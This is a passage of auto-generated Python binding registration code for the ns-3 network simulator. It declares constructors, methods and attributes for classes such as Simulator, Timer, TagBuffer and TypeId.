'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata::ItemIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator::ItemIterator(ns3::PacketMetadata const * metadata, ns3::Buffer buffer) [constructor] cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')]) ## packet-metadata.h (module 'network'): bool ns3::PacketMetadata::ItemIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item ns3::PacketMetadata::ItemIterator::Next() [member function] cls.add_method('Next', 'ns3::PacketMetadata::Item', []) return def register_Ns3PacketTagIterator_methods(root_module, cls): ## packet.h (module 'network'): ns3::PacketTagIterator::PacketTagIterator(ns3::PacketTagIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')]) ## packet.h (module 'network'): bool ns3::PacketTagIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## packet.h (module 'network'): ns3::PacketTagIterator::Item ns3::PacketTagIterator::Next() [member function] cls.add_method('Next', 'ns3::PacketTagIterator::Item', []) return def register_Ns3PacketTagIteratorItem_methods(root_module, cls): ## packet.h (module 'network'): ns3::PacketTagIterator::Item::Item(ns3::PacketTagIterator::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')]) ## packet.h (module 'network'): void ns3::PacketTagIterator::Item::GetTag(ns3::Tag & tag) const [member function] cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True) ## packet.h (module 'network'): ns3::TypeId ns3::PacketTagIterator::Item::GetTypeId() const [member function] 
cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) return def register_Ns3PacketTagList_methods(root_module, cls): ## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList() [constructor] cls.add_constructor([]) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::PacketTagList(ns3::PacketTagList const & o) [copy constructor] cls.add_constructor([param('ns3::PacketTagList const &', 'o')]) ## packet-tag-list.h (module 'network'): void ns3::PacketTagList::Add(ns3::Tag const & tag) const [member function] cls.add_method('Add', 'void', [param('ns3::Tag const &', 'tag')], is_const=True) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData const * ns3::PacketTagList::Head() const [member function] cls.add_method('Head', 'ns3::PacketTagList::TagData const *', [], is_const=True) ## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Peek(ns3::Tag & tag) const [member function] cls.add_method('Peek', 'bool', [param('ns3::Tag &', 'tag')], is_const=True) ## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Remove(ns3::Tag & tag) [member function] cls.add_method('Remove', 'bool', [param('ns3::Tag &', 'tag')]) ## packet-tag-list.h (module 'network'): void ns3::PacketTagList::RemoveAll() [member function] cls.add_method('RemoveAll', 'void', []) ## packet-tag-list.h (module 'network'): bool ns3::PacketTagList::Replace(ns3::Tag & tag) [member function] cls.add_method('Replace', 'bool', [param('ns3::Tag &', 'tag')]) return def register_Ns3PacketTagListTagData_methods(root_module, cls): ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData() [constructor] cls.add_constructor([]) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData(ns3::PacketTagList::TagData const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')]) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::count [variable] 
cls.add_instance_attribute('count', 'uint32_t', is_const=False) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::data [variable] cls.add_instance_attribute('data', 'uint8_t [ 21 ]', is_const=False) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::next [variable] cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::tid [variable] cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False) return def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3Simulator_methods(root_module, cls): ## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Simulator const &', 'arg0')]) ## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function] cls.add_method('Cancel', 'void', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function] cls.add_method('Destroy', 'void', [], is_static=True) ## simulator.h (module 'core'): static uint32_t 
ns3::Simulator::GetContext() [member function] cls.add_method('GetContext', 'uint32_t', [], is_static=True) ## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function] cls.add_method('GetDelayLeft', 'ns3::Time', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function] cls.add_method('GetImplementation', 'ns3::Ptr< ns3::SimulatorImpl >', [], is_static=True) ## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function] cls.add_method('GetMaximumSimulationTime', 'ns3::Time', [], is_static=True) ## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function] cls.add_method('GetSystemId', 'uint32_t', [], is_static=True) ## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function] cls.add_method('IsExpired', 'bool', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function] cls.add_method('IsFinished', 'bool', [], is_static=True) ## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function] cls.add_method('Now', 'ns3::Time', [], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function] cls.add_method('Remove', 'void', [param('ns3::EventId const &', 'id')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function] cls.add_method('SetImplementation', 'void', [param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function] cls.add_method('SetScheduler', 'void', 
[param('ns3::ObjectFactory', 'schedulerFactory')], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function] cls.add_method('Stop', 'void', [], is_static=True) ## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & delay) [member function] cls.add_method('Stop', 'void', [param('ns3::Time const &', 'delay')], is_static=True) return def register_Ns3SystemWallClockMs_methods(root_module, cls): ## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs(ns3::SystemWallClockMs const & arg0) [copy constructor] cls.add_constructor([param('ns3::SystemWallClockMs const &', 'arg0')]) ## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs() [constructor] cls.add_constructor([]) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::End() [member function] cls.add_method('End', 'int64_t', []) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedReal() const [member function] cls.add_method('GetElapsedReal', 'int64_t', [], is_const=True) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedSystem() const [member function] cls.add_method('GetElapsedSystem', 'int64_t', [], is_const=True) ## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedUser() const [member function] cls.add_method('GetElapsedUser', 'int64_t', [], is_const=True) ## system-wall-clock-ms.h (module 'core'): void ns3::SystemWallClockMs::Start() [member function] cls.add_method('Start', 'void', []) return def register_Ns3Tag_methods(root_module, cls): ## tag.h (module 'network'): ns3::Tag::Tag() [constructor] cls.add_constructor([]) ## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor] cls.add_constructor([param('ns3::Tag const &', 'arg0')]) ## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function] 
cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_virtual=True) ## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True) ## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3TagBuffer_methods(root_module, cls): ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor] cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')]) ## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor] cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function] cls.add_method('CopyFrom', 'void', [param('ns3::TagBuffer', 'o')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function] cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function] cls.add_method('ReadDouble', 'double', []) ## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function] cls.add_method('ReadU16', 'uint16_t', []) ## tag-buffer.h (module 'network'): uint32_t 
ns3::TagBuffer::ReadU32() [member function] cls.add_method('ReadU32', 'uint32_t', []) ## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function] cls.add_method('ReadU64', 'uint64_t', []) ## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function] cls.add_method('ReadU8', 'uint8_t', []) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function] cls.add_method('TrimAtEnd', 'void', [param('uint32_t', 'trim')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function] cls.add_method('WriteDouble', 'void', [param('double', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function] cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function] cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function] cls.add_method('WriteU64', 'void', [param('uint64_t', 'v')]) ## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'v')]) return def register_Ns3TimeWithUnit_methods(root_module, cls): cls.add_output_stream_operator() ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::TimeWithUnit const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeWithUnit const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeWithUnit::TimeWithUnit(ns3::Time const time, ns3::Time::Unit const unit) [constructor] cls.add_constructor([param('ns3::Time const', 'time'), param('ns3::Time::Unit 
const', 'unit')]) return def register_Ns3Timer_methods(root_module, cls): ## timer.h (module 'core'): ns3::Timer::Timer(ns3::Timer const & arg0) [copy constructor] cls.add_constructor([param('ns3::Timer const &', 'arg0')]) ## timer.h (module 'core'): ns3::Timer::Timer() [constructor] cls.add_constructor([]) ## timer.h (module 'core'): ns3::Timer::Timer(ns3::Timer::DestroyPolicy destroyPolicy) [constructor] cls.add_constructor([param('ns3::Timer::DestroyPolicy', 'destroyPolicy')]) ## timer.h (module 'core'): void ns3::Timer::Cancel() [member function] cls.add_method('Cancel', 'void', []) ## timer.h (module 'core'): ns3::Time ns3::Timer::GetDelay() const [member function] cls.add_method('GetDelay', 'ns3::Time', [], is_const=True) ## timer.h (module 'core'): ns3::Time ns3::Timer::GetDelayLeft() const [member function] cls.add_method('GetDelayLeft', 'ns3::Time', [], is_const=True) ## timer.h (module 'core'): ns3::Timer::State ns3::Timer::GetState() const [member function] cls.add_method('GetState', 'ns3::Timer::State', [], is_const=True) ## timer.h (module 'core'): bool ns3::Timer::IsExpired() const [member function] cls.add_method('IsExpired', 'bool', [], is_const=True) ## timer.h (module 'core'): bool ns3::Timer::IsRunning() const [member function] cls.add_method('IsRunning', 'bool', [], is_const=True) ## timer.h (module 'core'): bool ns3::Timer::IsSuspended() const [member function] cls.add_method('IsSuspended', 'bool', [], is_const=True) ## timer.h (module 'core'): void ns3::Timer::Remove() [member function] cls.add_method('Remove', 'void', []) ## timer.h (module 'core'): void ns3::Timer::Resume() [member function] cls.add_method('Resume', 'void', []) ## timer.h (module 'core'): void ns3::Timer::Schedule() [member function] cls.add_method('Schedule', 'void', []) ## timer.h (module 'core'): void ns3::Timer::Schedule(ns3::Time delay) [member function] cls.add_method('Schedule', 'void', [param('ns3::Time', 'delay')]) ## timer.h (module 'core'): void 
ns3::Timer::SetDelay(ns3::Time const & delay) [member function] cls.add_method('SetDelay', 'void', [param('ns3::Time const &', 'delay')]) ## timer.h (module 'core'): void ns3::Timer::Suspend() [member function] cls.add_method('Suspend', 'void', []) return def register_Ns3TimerImpl_methods(root_module, cls): ## timer-impl.h (module 'core'): ns3::TimerImpl::TimerImpl() [constructor] cls.add_constructor([]) ## timer-impl.h (module 'core'): ns3::TimerImpl::TimerImpl(ns3::TimerImpl const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimerImpl const &', 'arg0')]) ## timer-impl.h (module 'core'): void ns3::TimerImpl::Invoke() [member function] cls.add_method('Invoke', 'void', [], is_pure_virtual=True, is_virtual=True) ## timer-impl.h (module 'core'): ns3::EventId ns3::TimerImpl::Schedule(ns3::Time const & delay) [member function] cls.add_method('Schedule', 'ns3::EventId', [param('ns3::Time const &', 'delay')], is_pure_virtual=True, is_virtual=True) return def register_Ns3TypeId_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor] cls.add_constructor([param('char const *', 'name')]) ## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor] cls.add_constructor([param('ns3::TypeId const &', 'o')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), 
param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddAttribute', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')], deprecated=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor, std::string callback, ns3::TypeId::SupportLevel supportLevel=::ns3::TypeId::SUPPORTED, std::string const & supportMsg="") [member function] cls.add_method('AddTraceSource', 'ns3::TypeId', [param('std::string', 'name'), param('std::string', 'help'), 
param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor'), param('std::string', 'callback'), param('ns3::TypeId::SupportLevel', 'supportLevel', default_value='::ns3::TypeId::SUPPORTED'), param('std::string const &', 'supportMsg', default_value='""')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function] cls.add_method('GetAttribute', 'ns3::TypeId::AttributeInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function] cls.add_method('GetAttributeFullName', 'std::string', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function] cls.add_method('GetAttributeN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function] cls.add_method('GetConstructor', 'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function] cls.add_method('GetGroupName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function] cls.add_method('GetHash', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function] cls.add_method('GetName', 'std::string', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function] cls.add_method('GetParent', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function] 
cls.add_method('GetRegistered', 'ns3::TypeId', [param('uint32_t', 'i')], is_static=True) ## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function] cls.add_method('GetRegisteredN', 'uint32_t', [], is_static=True) ## type-id.h (module 'core'): std::size_t ns3::TypeId::GetSize() const [member function] cls.add_method('GetSize', 'std::size_t', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function] cls.add_method('GetTraceSource', 'ns3::TypeId::TraceSourceInformation', [param('uint32_t', 'i')], is_const=True) ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function] cls.add_method('GetTraceSourceN', 'uint32_t', [], is_const=True) ## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function] cls.add_method('GetUid', 'uint16_t', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function] cls.add_method('HasConstructor', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function] cls.add_method('HasParent', 'bool', [], is_const=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function] cls.add_method('HideFromDocumentation', 'ns3::TypeId', []) ## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function] cls.add_method('IsChildOf', 'bool', [param('ns3::TypeId', 'other')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function] cls.add_method('LookupAttributeByName', 'bool', [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)], is_const=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member 
function] cls.add_method('LookupByHash', 'ns3::TypeId', [param('uint32_t', 'hash')], is_static=True) ## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function] cls.add_method('LookupByHashFailSafe', 'bool', [param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')], is_static=True) ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function] cls.add_method('LookupByName', 'ns3::TypeId', [param('std::string', 'name')], is_static=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name')], is_const=True) ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name, ns3::TypeId::TraceSourceInformation * info) const [member function] cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name'), param('ns3::TypeId::TraceSourceInformation *', 'info')], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function] cls.add_method('MustHideFromDocumentation', 'bool', [], is_const=True) ## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function] cls.add_method('SetAttributeInitialValue', 'bool', [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function] cls.add_method('SetGroupName', 'ns3::TypeId', [param('std::string', 'groupName')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function] 
cls.add_method('SetParent', 'ns3::TypeId', [param('ns3::TypeId', 'tid')]) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetSize(std::size_t size) [member function] cls.add_method('SetSize', 'ns3::TypeId', [param('std::size_t', 'size')]) ## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t uid) [member function] cls.add_method('SetUid', 'void', [param('uint16_t', 'uid')]) return def register_Ns3TypeIdAttributeInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable] cls.add_instance_attribute('flags', 'uint32_t', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable] cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable] cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< 
ns3::AttributeValue const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable] cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::callback [variable] cls.add_instance_attribute('callback', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable] cls.add_instance_attribute('help', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportLevel [variable] cls.add_instance_attribute('supportLevel', 'ns3::TypeId::SupportLevel', is_const=False) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::supportMsg [variable] cls.add_instance_attribute('supportMsg', 'std::string', is_const=False) return def register_Ns3Empty_methods(root_module, cls): ## empty.h (module 'core'): ns3::empty::empty() [constructor] cls.add_constructor([]) ## empty.h (module 'core'): 
ns3::empty::empty(ns3::empty const & arg0) [copy constructor] cls.add_constructor([param('ns3::empty const &', 'arg0')]) return def register_Ns3Int64x64_t_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_unary_numeric_operator('-') cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', u'right')) cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', u'right')) cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor] cls.add_constructor([]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long double v) [constructor] cls.add_constructor([param('long double', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) 
